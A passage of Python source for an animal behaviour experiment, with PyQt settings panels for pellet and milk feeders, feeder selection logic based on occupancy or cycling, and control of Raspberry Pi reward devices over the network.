self.settings['MilkTrialMinSeparationVariance'] = QtWidgets.QLineEdit('0.5')
hbox.addWidget(self.settings['MilkTrialMinSeparationVariance'])
grid.addLayout(set_double_h_box_stretch(hbox), 1, 1)
# Specify minimum distance to feeder for starting a trial
hbox = QtWidgets.QHBoxLayout()
hbox.addWidget(QtWidgets.QLabel('Minimum Start Distance (cm)'))
self.settings['MilkTaskMinStartDistance'] = QtWidgets.QLineEdit('50')
hbox.addWidget(self.settings['MilkTaskMinStartDistance'])
grid.addLayout(set_double_h_box_stretch(hbox), 2, 1)
# Specify minimum angular distance to goal for starting a trial
hbox = QtWidgets.QHBoxLayout()
hbox.addWidget(QtWidgets.QLabel('Minimum Goal angular distance (deg)'))
self.settings['MilkTaskMinGoalAngularDistance'] = QtWidgets.QLineEdit('45')
hbox.addWidget(self.settings['MilkTaskMinGoalAngularDistance'])
grid.addLayout(set_double_h_box_stretch(hbox), 3, 1)
# Specify position history period for computing goal angular distance
hbox = QtWidgets.QHBoxLayout()
hbox.addWidget(QtWidgets.QLabel('Goal angular distance time (s)'))
self.settings['MilkTaskGoalAngularDistanceTime'] = QtWidgets.QLineEdit('2')
hbox.addWidget(self.settings['MilkTaskGoalAngularDistanceTime'])
grid.addLayout(set_double_h_box_stretch(hbox), 4, 1)
# Specify minimum distance to goal feeder for ending the trial
hbox = QtWidgets.QHBoxLayout()
hbox.addWidget(QtWidgets.QLabel('Minimum Goal Distance (cm)'))
self.settings['MilkTaskMinGoalDistance'] = QtWidgets.QLineEdit('10')
hbox.addWidget(self.settings['MilkTaskMinGoalDistance'])
grid.addLayout(set_double_h_box_stretch(hbox), 5, 1)
# Specify maximum trial duration
hbox = QtWidgets.QHBoxLayout()
hbox.addWidget(QtWidgets.QLabel('Maximum Trial Duration (s)'))
self.settings['MilkTrialMaxDuration'] = QtWidgets.QLineEdit('9')
hbox.addWidget(self.settings['MilkTrialMaxDuration'])
grid.addLayout(set_double_h_box_stretch(hbox), 6, 1)
# Specify method of choosing the next milk feeder
hbox = QtWidgets.QHBoxLayout()
hbox.addWidget(QtWidgets.QLabel('Next Goal'))
self.settings['MilkGoalNextFeederMethod'] = {'random': QtWidgets.QRadioButton('Random'),
'weighted': QtWidgets.QRadioButton('Weighted'),
'cycle': QtWidgets.QRadioButton('Cycle')}
self.settings['MilkGoalNextFeederMethod']['cycle'].setChecked(True)
hbox.addWidget(self.settings['MilkGoalNextFeederMethod']['random'])
hbox.addWidget(self.settings['MilkGoalNextFeederMethod']['weighted'])
hbox.addWidget(self.settings['MilkGoalNextFeederMethod']['cycle'])
self.button_groups['MilkGoalNextFeederMethod'] = QtWidgets.QButtonGroup()
self.button_groups['MilkGoalNextFeederMethod'].addButton(
self.settings['MilkGoalNextFeederMethod']['random'])
self.button_groups['MilkGoalNextFeederMethod'].addButton(
self.settings['MilkGoalNextFeederMethod']['weighted'])
self.button_groups['MilkGoalNextFeederMethod'].addButton(
self.settings['MilkGoalNextFeederMethod']['cycle'])
grid.addLayout(set_quadruple_h_box_stretch(hbox), 7, 1)
# Specify number of repretitions of each milk trial goal
hbox = QtWidgets.QHBoxLayout()
hbox.addWidget(QtWidgets.QLabel('Milk goal repetitions'))
self.settings['MilkGoalRepetition'] = QtWidgets.QLineEdit('0')
hbox.addWidget(self.settings['MilkGoalRepetition'])
grid.addLayout(set_double_h_box_stretch(hbox), 8, 1)
# Create Milk FEEDER items
scroll_widget = QtWidgets.QWidget()
self.milk_feeder_settings_layout = QtWidgets.QVBoxLayout(scroll_widget)
self.addMilkFeederButton = QtWidgets.QPushButton('Add FEEDER')
self.addMilkFeederButton.clicked.connect(lambda: self.addFeedersToList('milk'))
self.milk_feeder_settings_layout.addWidget(self.addMilkFeederButton)
scroll = QtWidgets.QScrollArea()
scroll.setWidget(scroll_widget)
scroll.setWidgetResizable(True)
vbox.addWidget(scroll)
# Add Milk Task settings to task specific settings layout
frame = QtWidgets.QFrame()
frame.setLayout(vbox)
frame.setFrameStyle(3)
# Set minimum size for frame
frame.setMinimumSize(800, 800)
return frame
def autoFeederPosition(self, target_feeder, max_attempts=1000):
target_feeder_spacing = np.int64(float(target_feeder['Spacing'].text()))
target_feeder_clearence = np.int64(float(target_feeder['Clearence'].text()))
# Collect positions and spacing settings of all other feeders
positions = []
spacings = []
for FEEDER in self.settings['FEEDERs']['milk']:
if not (target_feeder is FEEDER):
other_pos = np.array(list(map(float, str(FEEDER['Position'].text()).split(',')))).astype(np.float64)
positions.append(other_pos)
spacings.append(float(str(FEEDER['Spacing'].text())))
# Keep looking for new position until one matches criteria
n_attempt = 0
position_found = False
while not position_found and n_attempt < max_attempts:
n_attempt += 1
# Pick new position randomly from uniform distribution across the environment
position = np.array([random.random() * self.arena_size[0],
random.random() * self.arena_size[1]], dtype=np.int64)
position_found = True
# Check if it is too close to the boundaries
if position_found:
if distance_from_boundaries(position, self.arena_size) < target_feeder_clearence:
position_found = False
# Check if position is too close to any other feeder
if position_found:
for other_pos, other_spacing in zip(positions, spacings):
distance = euclidean(position, other_pos)
if distance < target_feeder_spacing or distance < other_spacing:
position_found = False
if position_found:
# Set position to correct format
position = ','.join(map(str, map(int, list(position))))
# Pick random orientation
angle = str(int(round(random.random() * 360.0)))
# Set position value in the target feeder box
target_feeder['Position'].setText(position)
# Set angle value in the target feeder box
target_feeder['Angle'].setText(angle)
else:
show_message('Could not find a position matching the criteria.')
def addFeedersToList(self, feeder_type, FEEDER_settings=None):
if FEEDER_settings is None:
FEEDER_settings = {'ID': '1',
'Present': True,
'Active': True,
'IP': '192.168.0.40',
'Position': np.array([100,50]),
'Angle': np.array(0),
'Spacing': np.array(60),
'Clearence': np.array(20),
'SignalHz': np.array(10000),
'SignalHzWidth': np.array(500),
'ModulHz': np.array(4)}
# Create interface for interacting with this FEEDER
FEEDER = {'Type': feeder_type}
vbox = QtWidgets.QVBoxLayout()
hbox = QtWidgets.QHBoxLayout()
hbox.addWidget(QtWidgets.QLabel('ID:'))
FEEDER['ID'] = QtWidgets.QLineEdit(FEEDER_settings['ID'])
FEEDER['ID'].setMaximumWidth(40)
hbox.addWidget(FEEDER['ID'])
hbox.addWidget(QtWidgets.QLabel('IP:'))
FEEDER['IP'] = QtWidgets.QLineEdit(FEEDER_settings['IP'])
FEEDER['IP'].setMinimumWidth(105)
hbox.addWidget(FEEDER['IP'])
activateButton = QtWidgets.QPushButton('Activate')
activateButton.setMinimumWidth(70)
activateButton.setMaximumWidth(70)
FEEDER['ReleaseQuantity'] = QtWidgets.QLineEdit('1')
FEEDER['ReleaseQuantity'].setMaximumWidth(40)
activateButton.clicked.connect(lambda: activate_feeder(feeder_type, FEEDER['IP'],
self.settings['Username'],
self.settings['Password'],
FEEDER['ReleaseQuantity']))
hbox.addWidget(activateButton)
hbox.addWidget(FEEDER['ReleaseQuantity'])
vbox.addLayout(hbox)
hbox = QtWidgets.QHBoxLayout()
FEEDER['Present'] = QtWidgets.QCheckBox('Present')
FEEDER['Present'].setChecked(FEEDER_settings['Present'])
hbox.addWidget(FEEDER['Present'])
FEEDER['Active'] = QtWidgets.QCheckBox('Active')
FEEDER['Active'].setChecked(FEEDER_settings['Active'])
hbox.addWidget(FEEDER['Active'])
hbox.addWidget(QtWidgets.QLabel('Position:'))
FEEDER['Position'] = QtWidgets.QLineEdit(','.join(map(str, FEEDER_settings['Position'])))
FEEDER['Position'].setMinimumWidth(70)
FEEDER['Position'].setMaximumWidth(70)
hbox.addWidget(FEEDER['Position'])
vbox.addLayout(hbox)
if feeder_type == 'milk':
hbox = QtWidgets.QHBoxLayout()
# Add minimum spacing betwen feeders
hbox.addWidget(QtWidgets.QLabel('Spacing:'))
FEEDER['Spacing'] = QtWidgets.QLineEdit(str(FEEDER_settings['Spacing']))
FEEDER['Spacing'].setMinimumWidth(40)
FEEDER['Spacing'].setMaximumWidth(40)
hbox.addWidget(FEEDER['Spacing'])
# Add minimum clearence from boundaries
hbox.addWidget(QtWidgets.QLabel('Clearence:'))
FEEDER['Clearence'] = QtWidgets.QLineEdit(str(FEEDER_settings['Clearence']))
FEEDER['Clearence'].setMinimumWidth(40)
FEEDER['Clearence'].setMaximumWidth(40)
hbox.addWidget(FEEDER['Clearence'])
# Add angular position to specify feeder orientation
hbox.addWidget(QtWidgets.QLabel('Angle:'))
FEEDER['Angle'] = QtWidgets.QLineEdit(str(FEEDER_settings['Angle']))
FEEDER['Angle'].setMinimumWidth(60)
FEEDER['Angle'].setMaximumWidth(60)
hbox.addWidget(FEEDER['Angle'])
# Add a button to automatically select feeder orientation and angle
autoPosButton = QtWidgets.QPushButton('AutoPos')
autoPosButton.setMinimumWidth(70)
autoPosButton.setMaximumWidth(70)
autoPosButton.clicked.connect(lambda: self.autoFeederPosition(FEEDER))
hbox.addWidget(autoPosButton)
# Finish this row of options
vbox.addLayout(hbox)
# Add sound signal values
hbox = QtWidgets.QHBoxLayout()
hbox.addWidget(QtWidgets.QLabel('Signal (Hz):'))
FEEDER['SignalHz'] = QtWidgets.QLineEdit(str(FEEDER_settings['SignalHz']))
hbox.addWidget(FEEDER['SignalHz'])
hbox.addWidget(QtWidgets.QLabel('W:'))
if not 'SignalHzWidth' in FEEDER_settings.keys():
print('Remove this section in Pellets_and_Milk_Task.py when settings resaved!')
FEEDER_settings['SignalHzWidth'] = np.array(500)
FEEDER['SignalHzWidth'] = QtWidgets.QLineEdit(str(FEEDER_settings['SignalHzWidth']))
hbox.addWidget(FEEDER['SignalHzWidth'])
hbox.addWidget(QtWidgets.QLabel('M:'))
FEEDER['ModulHz'] = QtWidgets.QLineEdit(str(FEEDER_settings['ModulHz']))
hbox.addWidget(FEEDER['ModulHz'])
playSignalButton = QtWidgets.QPushButton('Play')
playSignalButton.setMaximumWidth(40)
playSignalButton.clicked.connect(lambda: play_audio_signal(FEEDER['SignalHz'],
FEEDER['SignalHzWidth'],
FEEDER['ModulHz']))
hbox.addWidget(playSignalButton)
vbox.addLayout(hbox)
frame = QtWidgets.QFrame()
frame.setLayout(vbox)
frame.setFrameStyle(3)
if feeder_type == 'milk':
frame.setMaximumHeight(160)
else:
frame.setMaximumHeight(90)
if feeder_type == 'pellet':
self.pellet_feeder_settings_layout.addWidget(frame)
elif feeder_type == 'milk':
self.milk_feeder_settings_layout.addWidget(frame)
self.settings['FEEDERs'][feeder_type].append(FEEDER)
def export_settings_from_gui(self):
# Get task settings from text boxes
TaskSettings = {'LastTravelTime': np.float64(str(self.settings['LastTravelTime'].text())),
'LastTravelSmooth': np.int64(float(str(self.settings['LastTravelSmooth'].text()))),
'LastTravelDist': np.int64(float(str(self.settings['LastTravelDist'].text()))),
'PelletMilkRatio': np.float64(str(self.settings['PelletMilkRatio'].text())),
'Chewing_TTLchan': np.int64(float(str(self.settings['Chewing_TTLchan'].text()))),
'MilkGoalRepetition': np.int64(float(str(self.settings['MilkGoalRepetition'].text()))),
'Username': str(self.settings['Username'].text()),
'Password': str(self.settings['Password'].text()),
'NegativeAudioSignal': np.float64(str(self.settings['NegativeAudioSignal'].text())),
'lightSignalProbability': np.float64(str(self.settings['lightSignalProbability'].text())),
'lightSignalIntensity': np.int64(str(self.settings['lightSignalIntensity'].text())),
'lightSignalDelay': np.float64(str(self.settings['lightSignalDelay'].text())),
'lightSignalPins': str(self.settings['lightSignalPins'].text()),
'InitPellets': np.int64(float(str(self.settings['InitPellets'].text()))),
'PelletQuantity': np.int64(float(str(self.settings['PelletQuantity'].text()))),
'PelletRewardMinSeparationMean': np.int64(float(str(self.settings['PelletRewardMinSeparationMean'].text()))),
'PelletRewardMinSeparationVariance': np.float64(str(self.settings['PelletRewardMinSeparationVariance'].text())),
'Chewing_Target': np.int64(float(str(self.settings['Chewing_Target'].text()))),
'MaxInactivityDuration': np.int64(float(str(self.settings['MaxInactivityDuration'].text()))),
'MilkTrialFailPenalty': np.int64(float(str(self.settings['MilkTrialFailPenalty'].text()))),
'InitMilk': np.float64(str(self.settings['InitMilk'].text())),
'MilkTrialMinSeparationMean': np.int64(float(str(self.settings['MilkTrialMinSeparationMean'].text()))),
'MilkTrialMinSeparationVariance': np.float64(str(self.settings['MilkTrialMinSeparationVariance'].text())),
'MilkTaskMinStartDistance': np.int64(float(str(self.settings['MilkTaskMinStartDistance'].text()))),
'MilkTaskMinGoalDistance': np.int64(float(str(self.settings['MilkTaskMinGoalDistance'].text()))),
'MilkTaskMinGoalAngularDistance': np.int64(float(str(self.settings['MilkTaskMinGoalAngularDistance'].text()))),
'MilkTaskGoalAngularDistanceTime': np.float64(float(str(self.settings['MilkTaskGoalAngularDistanceTime'].text()))),
'MilkTrialMaxDuration': np.int64(float(str(self.settings['MilkTrialMaxDuration'].text())))}
# Get boolean selection for Active Game settings
TaskSettings['games_active'] = {}
for key in self.settings['games_active'].keys():
state = self.settings['games_active'][key].isChecked()
TaskSettings['games_active'][key] = np.array(state)
# Get milk reward quantity options
TaskSettings['MilkQuantity'] = {}
for key in self.settings['MilkQuantity']:
TaskSettings['MilkQuantity'][key] = np.float64(str(self.settings['MilkQuantity'][key].text()))
# Get radio button selection
for key in self.settings['AudioSignalMode'].keys():
if self.settings['AudioSignalMode'][key].isChecked():
TaskSettings['AudioSignalMode'] = key
for key in self.settings['MilkGoalNextFeederMethod'].keys():
if self.settings['MilkGoalNextFeederMethod'][key].isChecked():
TaskSettings['MilkGoalNextFeederMethod'] = key
# Get boolean selection for LightSignal repetition trial settings
TaskSettings['LightSignalOnRepetitions'] = {}
for key in self.settings['LightSignalOnRepetitions'].keys():
state = self.settings['LightSignalOnRepetitions'][key].isChecked()
TaskSettings['LightSignalOnRepetitions'][key] = np.array(state)
# Get FEEDER specific information
FEEDERs = {}
for feeder_type in self.settings['FEEDERs'].keys():
if len(self.settings['FEEDERs'][feeder_type]) > 0:
FEEDERs[feeder_type] = {}
IDs = []
for feeder in self.settings['FEEDERs'][feeder_type]:
IDs.append(str(int(str(feeder['ID'].text()))))
FEEDERs[feeder_type][IDs[-1]] = {'ID': IDs[-1],
'Present': np.array(feeder['Present'].isChecked()),
'Active': np.array(feeder['Active'].isChecked()),
'IP': str(feeder['IP'].text()),
'Position': np.array(list(map(int, str(feeder['Position'].text()).split(','))))}
if feeder_type == 'milk':
FEEDERs[feeder_type][IDs[-1]]['Spacing'] = np.int64(float(str(feeder['Spacing'].text())))
FEEDERs[feeder_type][IDs[-1]]['Clearence'] = np.int64(float(str(feeder['Clearence'].text())))
FEEDERs[feeder_type][IDs[-1]]['Angle'] = np.int64(float(str(feeder['Angle'].text())))
FEEDERs[feeder_type][IDs[-1]]['SignalHz'] = np.int64(float(str(feeder['SignalHz'].text())))
FEEDERs[feeder_type][IDs[-1]]['SignalHzWidth'] = np.int64(float(str(feeder['SignalHzWidth'].text())))
FEEDERs[feeder_type][IDs[-1]]['ModulHz'] = np.int64(float(str(feeder['ModulHz'].text())))
# Check if there are duplicates of FEEDER IDs
if any(IDs.count(ID) > 1 for ID in IDs):
raise ValueError('Duplicates of IDs in ' + feeder_type + ' feeders!')
else:
show_message('No ' + feeder_type + ' FEEDERs entered.')
TaskSettings['FEEDERs'] = FEEDERs
return TaskSettings
def import_settings_to_gui(self, TaskSettings):
# Load all settings
for key in TaskSettings.keys():
try:
if isinstance(TaskSettings[key], np.ndarray) and TaskSettings[key].dtype == 'bool':
self.settings[key].setChecked(TaskSettings[key])
elif key == 'games_active':
for repeat_key in TaskSettings['games_active'].keys():
state = TaskSettings['games_active'][repeat_key]
self.settings['games_active'][repeat_key].setChecked(state)
elif key == 'AudioSignalMode':
for mode_key in self.settings['AudioSignalMode'].keys():
if TaskSettings['AudioSignalMode'] == mode_key:
self.settings['AudioSignalMode'][mode_key].setChecked(True)
elif key == 'MilkGoalNextFeederMethod':
for mode_key in self.settings['MilkGoalNextFeederMethod'].keys():
if TaskSettings['MilkGoalNextFeederMethod'] == mode_key:
self.settings['MilkGoalNextFeederMethod'][mode_key].setChecked(True)
elif key == 'LightSignalOnRepetitions':
for repeat_key in TaskSettings['LightSignalOnRepetitions'].keys():
state = TaskSettings['LightSignalOnRepetitions'][repeat_key]
self.settings['LightSignalOnRepetitions'][repeat_key].setChecked(state)
elif key == 'FEEDERs':
for feeder_type in TaskSettings['FEEDERs'].keys():
for ID in sorted(TaskSettings['FEEDERs'][feeder_type].keys(), key=int):
FEEDER_settings = TaskSettings['FEEDERs'][feeder_type][ID]
self.addFeedersToList(feeder_type, FEEDER_settings)
elif isinstance(TaskSettings[key], dict):
for sub_key in TaskSettings[key]:
self.settings[key][sub_key].setText(str(TaskSettings[key][sub_key]))
elif key in self.settings.keys():
self.settings[key].setText(str(TaskSettings[key]))
except:
print('Failed to load setting: ' + str(key))
def smooth_edge_padding(data, smoothing):
originalSize = data.size
data = np.convolve(data, np.ones((smoothing,))/smoothing, mode='valid')
missing = originalSize - data.size
addStart = int(np.floor(missing / 2.0))
addEnd = int(np.ceil(missing / 2.0))
data = np.lib.pad(data, (addStart, addEnd), 'edge')
return data
def compute_distance_travelled(posHistory, smoothing):
distances = []
posHistory = np.array(posHistory)
posHistory = posHistory[:, :2]
posHistory[:,0] = smooth_edge_padding(posHistory[:,0], smoothing)
posHistory[:,1] = smooth_edge_padding(posHistory[:,1], smoothing)
for npos in range(posHistory.shape[0] - 1):
prev_pos = posHistory[npos, :]
curr_pos = posHistory[npos + 1, :]
distance = euclidean(prev_pos, curr_pos)
distances.append(distance)
total_distance = np.sum(np.array(distances))
return total_distance
def unit_vector(vector):
""" Returns the unit vector of the vector. """
return vector / np.linalg.norm(vector)
def angle_between(v1, v2):
""" Returns the angle in radians between vectors 'v1' and 'v2'::
>>> angle_between((1, 0, 0), (0, 1, 0))
1.5707963267948966
>>> angle_between((1, 0, 0), (1, 0, 0))
0.0
>>> angle_between((1, 0, 0), (-1, 0, 0))
3.141592653589793
"""
v1_u = unit_vector(v1)
v2_u = unit_vector(v2)
return np.arccos(np.clip(np.dot(v1_u, v2_u), -1.0, 1.0))
def compute_mean_movement_vector(posHistory):
posHistory = np.array(posHistory)
posHistory = posHistory[:, :2]
posVectors = posHistory[1:, :] - posHistory[:-1, :]
posVector = np.nanmean(posVectors, axis=0)
return posVector
def compute_mean_posHistory(posHistory):
posHistory = np.array(posHistory)
posHistory = posHistory[:, :2]
mean_posHistory = np.nanmean(posHistory, axis=0)
return mean_posHistory
def compute_movement_angular_distance_to_target(posHistory, target_location):
"""
Computes angular distance between mean movement vector and direct path to target location.
Outputs None if norm of mean movement vector is 0.
"""
posVector = compute_mean_movement_vector(posHistory)
if np.linalg.norm(posVector) > 0:
targetVector = target_location - posHistory[-1][:2]
angle_rad = angle_between(posVector, targetVector)
angle = np.rad2deg(angle_rad)
else:
angle = None
return angle
def draw_rect_with_border(surface, fill_color, outline_color, position, border=1):
rect = pygame.Rect(position)
surface.fill(outline_color, rect)
surface.fill(fill_color, rect.inflate(-border*2, -border*2))
class PelletChoice(object):
"""
Selects the next feeder using positional occupancy.
Query read PelletChoice.ID for current feeder.
Use PelletChoice.next() method to choose next feeder.
"""
def __init__(self, PelletRewardDevices, position_histogram_array, position_histogram_dict, arena_size):
self.PelletRewardDevices = PelletRewardDevices
self.position_histogram_array = position_histogram_array
self.position_histogram_dict = position_histogram_dict
self.arena_size = arena_size
self.next()
def _compute_position_histogram_nearest_feeders(self, IDs_active):
self.old_IDs_active = IDs_active
# Get feeder locations
FEEDER_Locs = []
for ID in IDs_active:
FEEDER_Locs.append(np.array(self.PelletRewardDevices.positions[ID], dtype=np.float32))
# Get occupancy histogram information from position_histogram_dict
self.old_PelletHistogramParameters = deepcopy(self.position_histogram_dict['parameters'])
self.histogramPfeederMap = {}
# Convert histogram edges to bin centers
histXedges = self.position_histogram_dict['edges']['x']
histYedges = self.position_histogram_dict['edges']['y']
histXbin = (histXedges[1:] + histXedges[:-1]) / 2
histYbin = (histYedges[1:] + histYedges[:-1]) / 2
# Crop data to only include parts inside the arena boundaries
idx_X = np.logical_and(0 < histXbin, histXbin < self.arena_size[0])
idx_Y = np.logical_and(0 < histYbin, histYbin < self.arena_size[1])
histXbin = histXbin[idx_X]
histYbin = histYbin[idx_Y]
self.histogramPfeederMap['idx_crop_X'] = np.repeat(np.where(idx_X)[0][None, :],
histYbin.size, axis=0)
self.histogramPfeederMap['idx_crop_Y'] = np.repeat(np.where(idx_Y)[0][:, None],
histXbin.size, axis=1)
# Find closest feeder for each spatial bin
histFeeder = np.zeros((histYbin.size, histXbin.size), dtype=np.int16)
for xpos in range(histXbin.size):
for ypos in range(histYbin.size):
pos = np.array([histXbin[xpos], histYbin[ypos]], dtype=np.float32)
dists = np.zeros(len(IDs_active), dtype=np.float32)
for n_feeder in range(len(IDs_active)):
dists[n_feeder] = np.linalg.norm(FEEDER_Locs[n_feeder] - pos)
histFeeder[ypos, xpos] = np.argmin(dists)
self.histogramPfeederMap['feeder_map'] = histFeeder
def _ensure_nearest_feeder_map_valid(self, IDs_active):
histparam = deepcopy(self.position_histogram_dict['parameters'])
histogram_same = hasattr(self, 'old_PelletHistogramParameters') and \
self.old_PelletHistogramParameters == histparam
feeders_same = hasattr(self, 'old_IDs_active') and \
self.old_IDs_active == IDs_active
if not histogram_same or not feeders_same:
self._compute_position_histogram_nearest_feeders(IDs_active)
@staticmethod
def weighted_randomness(weights):
relative_weights = (np.sum(weights) - weights) ** 2
probability = relative_weights / np.sum(relative_weights)
return np.random.choice(len(probability), p=probability)
def next(self):
"""
Uses relative mean occupancy in bins closest to each feeder
to increase probability of selecting feeder with lower mean occupancy.
"""
IDs_active = copy(self.PelletRewardDevices.IDs_active)
self._ensure_nearest_feeder_map_valid(IDs_active)
if len(IDs_active) > 1:
# Get occupancy information from position_histogram_dict
histmap = np.reshape(self.position_histogram_array,
self.position_histogram_dict['array_shape'])
# Crop histogram to relevant parts
histmap = histmap[self.histogramPfeederMap['idx_crop_Y'], self.histogramPfeederMap['idx_crop_X']]
# Find mean occupancy in bins nearest to each feeder
feeder_bin_occupancy = np.zeros(len(IDs_active), dtype=np.float64)
for n_feeder in range(len(IDs_active)):
bin_occupancies = histmap[self.histogramPfeederMap['feeder_map'] == n_feeder]
feeder_bin_occupancy[n_feeder] = np.mean(bin_occupancies)
# Choose feeder with weighted randomness if any parts occupied
if np.any(feeder_bin_occupancy > 0):
n_feeder = PelletChoice.weighted_randomness(feeder_bin_occupancy)
else:
n_feeder = np.random.choice(len(IDs_active))
else:
n_feeder = 0
# Update current feeder ID
self.ID = IDs_active[n_feeder]
return self.ID
class MilkGoal(object):
"""
Determines the sequence of milk feeder goal decisions.
Query read MilkGoal.ID for current feeder.
Use MilkGoal.next() method to choose next feeder.
"""
def __init__(self, activeMfeeders, next_feeder_method='random', repetitions=0):
"""
activeMfeeders - list - elements are returned with next() method as choices
next_feeder_method - str - 'random' (default) or 'cycle'
repetitions - int - number of repetitions to do per each feeder
"""
self.activeMfeeders = activeMfeeders
self.next_feeder_method = next_feeder_method
self.repetitions = repetitions
if self.next_feeder_method == 'cycle':
self._initialize_sequence()
self.next()
elif self.next_feeder_method == 'weighted':
self.ID = self.activeMfeeders[MilkGoal.choose_randomly(self.activeMfeeders)]
elif self.next_feeder_method == 'random':
self.next()
else:
raise ValueError('Unexpected next_feeder_method argument.')
def _initialize_sequence(self):
"""
Initializes the sequence of feeders and initial position.
"""
if self.next_feeder_method == 'cycle':
self.sequence = range(len(self.activeMfeeders))
np.random.shuffle(self.sequence)
# Set repetition counter and position to very last in sequence,
# so that first call to next() method would start sequence from beginning.
self.repetition_counter = self.repetitions
self.sequence_position = len(self.activeMfeeders)
def re_init(self, activeMfeeders=None, next_feeder_method=None, repetitions=None):
"""
Allows re-initializing the class with any subset of input variables.
"""
if not (activeMfeeders is None):
self.activeMfeeders = activeMfeeders
if not (next_feeder_method is None):
self.next_feeder_method = next_feeder_method
if not (repetitions is None):
self.repetitions = repetitions
if self.next_feeder_method == 'cycle':
self._initialize_sequence()
self.next()
@staticmethod
def choose_with_weighted_randomness(activeMfeeders, game_counters):
"""
Chooses feeder from list with weighted randomness that is based on
performance in the task. Feeders that where there has been
fewer successful trials are more likely to be chosen.
"""
# Find number of successful trials for each feeder
n_successful_trials = []
for ID in activeMfeeders:
idx = game_counters['Successful']['ID'].index(ID)
n_successful_trials.append(game_counters['Successful']['count'][idx])
n_successful_trials = np.array(n_successful_trials, dtype=np.float64)
# Choose feeder with weighted randomness if any trial has been successful
if np.any(n_successful_trials > 0):
feederProbabilityWeights = np.sum(n_successful_trials) - n_successful_trials
feederProbability = feederProbabilityWeights / np.sum(feederProbabilityWeights)
n_feeder = np.random.choice(len(activeMfeeders), p=feederProbability)
else:
# If not trial has been successful, pick feeder randomly
n_feeder = np.random.choice(len(activeMfeeders))
@staticmethod
def choose_randomly(activeMfeeders):
return np.random.choice(len(activeMfeeders))
def check_if_first_repetition(self):
if self.repetitions > 0:
return self.repetition_counter == 0
else:
return True
def copy_ID(self):
return copy(self.ID)
def next(self, game_counters=None):
"""
Selects the next feeder chosen from the activeMfeeders list elements,
using the choice method provided during initialization.
game_counters - dict with specific structure (see choose_with_weighted_randomness() method)
only required for weighted random choice.
"""
if self.next_feeder_method == 'random':
n_feeder = MilkGoal.choose_randomly(self.activeMfeeders)
elif self.next_feeder_method == 'weighted':
if game_counters is None:
raise Exception('game_counters input required for weigthed randomness ' \
+ 'in next MilkGoal decision.')
n_feeder = MilkGoal.choose_with_weighted_randomness(self.activeMfeeders,
game_counters)
elif self.next_feeder_method == 'cycle':
self.repetition_counter += 1
if self.repetition_counter > self.repetitions:
# If counter has maxed out, move up in sequence position and reset counter
self.sequence_position = np.mod(self.sequence_position + 1, len(self.sequence))
self.repetition_counter = 0
n_feeder = self.sequence[self.sequence_position]
# Set current ID of milk goal
self.ID = self.activeMfeeders[n_feeder]
class RewardDevices(object):
def __init__ (self, FEEDERs, feeder_type, username, password,
feeder_kwargs={}, inactivation_signal=None):
"""
FEEDERs - dict - key (ID) and value (feeder specific parameters)
feeder_type - str - passed on to RPiInterface.RewardControl
username - str - username for all the Raspberry Pis in FEEDERs dict
password - str - password for all the Raspberry Pis in FEEDERs dict
feeder_kwargs - dict - key (ID) and value (feeder specific kwargs to be
passed to RPiInterfaces.RwardControl)
inactivation_signal - this method is called with feeder_type and ID as argument
when a feeder is being inactivated.
"""
# Parse input arguments
self.FEEDERs = FEEDERs
self.feeder_type = feeder_type
self.username = username
self.password = password
self.FEEDER_kwargs = feeder_kwargs
self._inactivation_signal = inactivation_signal
# Create Locks for all feeders
self.FEEDERs_Locks = {}
for ID in self.FEEDERs.keys():
self.FEEDERs_Locks[ID] = Lock()
# Create a list of feeders present
self.IDs_present = []
for ID in self.FEEDERs.keys():
if self.FEEDERs[ID]['Present']:
self.IDs_present.append(ID)
self.IDs_present = sorted(self.IDs_present, key=int)
# Create dictionary of feeder positions
self.positions = {}
for ID in self.FEEDERs.keys():
self.positions[ID] = copy(self.FEEDERs[ID]['Position'])
# Initialize all feeders concurrently
T_initFEEDER = []
for ID in self.FEEDERs.keys():
if (self.FEEDERs[ID]['Active']
or (ID in feeder_kwargs
and 'negativeAudioSignal' in feeder_kwargs[ID]
and feeder_kwargs[ID]['negativeAudioSignal'] > 0)):
T = Thread(target=self._initFEEDER, args=(ID,))
T.start()
T_initFEEDER.append(T)
for T in T_initFEEDER:
T.join()
# Create a list of active feeder IDs
self.IDs_active = []
for ID in self.FEEDERs.keys():
if self.FEEDERs[ID]['Active'] and self.FEEDERs[ID]['init_successful']:
self.IDs_active.append(ID)
self.IDs_active = sorted(self.IDs_active, key=int)
def _initFEEDER(self, ID):
with self.FEEDERs_Locks[ID]:
IP = self.FEEDERs[ID]['IP']
try:
kwargs = self.FEEDER_kwargs[ID] if ID in self.FEEDER_kwargs.keys() else {}
actuator = RewardControl(self.feeder_type, IP, self.username,
self.password, **kwargs)
with self.FEEDERs_Locks[ID]:
self.FEEDERs[ID]['actuator'] = actuator
self.FEEDERs[ID]['init_successful'] = True
except Exception as e:
from inspect import currentframe, getframeinfo
frameinfo = getframeinfo(currentframe())
print('Error in ' + frameinfo.filename + ' line ' + str(frameinfo.lineno - 3))
print('initFEEDER failed for: ' + IP)
print(e)
with self.FEEDERs_Locks[ID]:
self.FEEDERs[ID]['init_successful'] = False
def actuator_method_call(self, ID, method_name, *args, **kwargs):
"""
ID - str - identifies which feeder to use
method_name - str - name of the method to call
Method will be called with any following args and kwargs
"""
with self.FEEDERs_Locks[ID]:
if 'actuator' in self.FEEDERs[ID].keys():
return getattr(self.FEEDERs[ID]['actuator'], method_name)(*args, **kwargs)
else:
warnings.warn('FEEDER ' + str(ID) + ' does not have an active acutator.')
def inactivate_feeder(self, ID):
# Remove feeder from active feeder list
self.IDs_active.remove(ID)
# Invoke the deactivation signal if provided during initialization
if not (self._inactivation_signal is None):
self._inactivation_signal(self.feeder_type, ID)
# Close actuator for this feeder
with self.FEEDERs_Locks[ID]:
if 'actuator' in self.FEEDERs[ID].keys():
actuator = self.FEEDERs[ID].pop('actuator')
if hasattr(actuator, 'close'):
# Deactivate in a separate thread in case it crashes
Thread(target=actuator.close).start()
def close(self):
for ID in self.FEEDERs.keys():
if 'actuator' in self.FEEDERs[ID].keys():
if hasattr(self.FEEDERs[ID]['actuator'], 'close'):
self.FEEDERs[ID]['actuator'].close()
class ChewingTracker(object):
def __init__(self, chewing_ttl_chan):
self.chewing_ttl_chan = chewing_ttl_chan
self.ttlTimes = np.array([], dtype=np.float64)
self.ttlTimesLock = Lock()
def check_for_chewing_message(self, message):
parts = message.split()
if parts[2] == str(self.chewing_ttl_chan) and parts[3] == str(1):
with self.ttlTimesLock:
self.ttlTimes = np.append(self.ttlTimes, time())
def number_of_chewings(self, time_from):
with self.ttlTimesLock:
